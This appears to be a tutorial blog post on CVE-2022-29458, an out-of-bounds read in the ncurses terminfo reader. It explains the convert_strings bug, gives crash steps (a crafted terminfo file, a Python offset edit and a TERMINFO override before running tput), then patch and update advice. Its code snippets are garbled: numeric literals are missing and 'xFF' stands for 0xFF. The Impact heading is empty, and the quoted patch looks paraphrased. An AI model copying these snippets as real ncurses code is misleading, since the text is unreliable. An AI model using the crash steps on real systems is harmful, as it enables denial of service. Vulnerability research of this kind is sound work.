CVE-2022-29458 - Exploiting Out-of-Bounds Read in ncurses 6.3 Terminfo Library

ncurses is the backbone for text-based user interfaces in Unix-like systems. But even popular libraries can have critical bugs. In 2022, a serious vulnerability (CVE-2022-29458) was found in ncurses 6.3, specifically in its terminfo library. This bug can cause out-of-bounds memory reads and crashes, opening doors for denial-of-service attacks — and, in some cases, information leaks or even code execution.

This tutorial explains CVE-2022-29458 in plain language, dives into the affected code, and demonstrates exploitation with simple examples. If you’re a developer, sysadmin, or security researcher, keep reading. Patching this bug is crucial!

What is CVE-2022-29458?

Short answer:
It's an out-of-bounds read (which can turn into a segmentation fault) caused by mishandling string tables inside the convert_strings function in ncurses’s terminfo reader.

Affected software:

ncurses 6.3 and earlier (before patch 20220416)

- Library file: tinfo/read_entry.c

Impact:

Why Does This Happen?

The problem lies in the convert_strings function, which processes terminfo files. Terminfo files describe terminal capabilities with a set of string fields. When a terminfo file is malformed (i.e., string offsets point outside the actual string table), convert_strings did not properly check the boundaries. This can result in the function reading beyond the buffer, possibly crashing the process or leaking sensitive data.

Here’s the problematic section from ncurses-6.3/tinfo/read_entry.c (pre-patch)

// Simplified code (before patch 20220416)
if (have_strings > ) {
    strings = (char *)_nc_doalloc(, str_count + 1 + 1);

    for (i = ; i < str_count; i++) {
        if (str_table != 
            && value[i] >= 
            && (unsigned)value[i] < str_limit) {
          // Copy string from str_table+value[i]
          strcpy(strings + offsets[i], str_table + value[i]);
        }
    }
}

For each entry, it uses value[i] as the offset into str_table.

- It checks that value[i] is non-negative and less than str_limit, but does not check if str_table + value[i] is within the actual buffer, nor if the string continues past the buffer end.
- Malicious data here can make str_table + value[i] point outside the buffer, triggering undefined behavior.

How to Exploit CVE-2022-29458

This bug is exploited by crafting a malicious terminfo file with an incorrect string offset — one that points past the end of the string table.

malformed_terminfo.src

myterm|My dangerous terminfo,
    cup=\E[%i%p1%d;%p2%dH,

Now, compile with tic but intentionally corrupt the offset by editing the binary

tic malformed_terminfo.src
# Now use a hex editor to OVERWRITE the offset for cup beyond the actual string table

Alternatively, use Python to manipulate offsets

with open('malformed_terminfo', 'rb') as f:
    data = bytearray(f.read())
# Locate offset (check terminfo format documentation) and set it past length of string table
data[offset_location] = xFF  # way too high
with open('malformed_terminfo_bad', 'wb') as f:
    f.write(data)

Direct any ncurses app (like tput or even less) to use this terminfo file by setting the TERMINFO environment variable:

export TERMINFO=/path/to/malformed
tput cup 10 10

Expect a crash or a segmentation fault. The convert_strings function will read beyond the buffer, and in debug builds or with AddressSanitizer, you’ll see an out-of-bounds read.

The Patch: What Changed?

Here’s the official patch:

// New boundary checks before accessing offsets and string table
if ((unsigned)value[i] < str_limit
    && _nc_check_termtype(type, str_table + value[i])) {
    // ...
}

The patch ensures offsets are properly validated before being used, preventing reads outside the string table.

Real-World Impact

- Denial of Service: Any tool that loads crafted terminfo entries can be crashed remotely or locally.
- Info leak: If sensitive data follows the string table in memory, some of it might be read out and exposed.
- Chained attacks: Combined with other vulnerabilities, could lead to more serious security breaches.

Most users are vulnerable if untrusted terminfo files can be loaded (typically, either by compiling as your user or by admins via /usr/share/terminfo).

Update to ncurses >= 6.3 patch 20220416

Download here

`bash

sudo apt update && sudo apt upgrade # Ubuntu/Debian
sudo yum update # Fedora/CentOS/RHEL
`

- Avoid untrusted terminfo files:
Don't use or install terminal descriptions from unknown sources.

---

## References

- NVD Description for CVE-2022-29458
- Original Patch on GitHub
- ncurses Terminfo Documentation
- Exploit Database Entry
- ncurses Homepage

---

## Conclusion

CVE-2022-29458 is a simple yet dangerous bug living in a core library used by almost every terminal app on Unix-like systems. The lesson is clear: Always validate your inputs, even in “internal” formats like terminfo. Stay patched, and avoid using system files from untrusted sources!

*Share this post to raise awareness. If your project relies on ncurses (which, honestly, many do), double-check your library version and patch status today.*

Timeline

Published on: 04/18/2022 21:15:00 UTC
Last modified on: 04/27/2022 13:14:00 UTC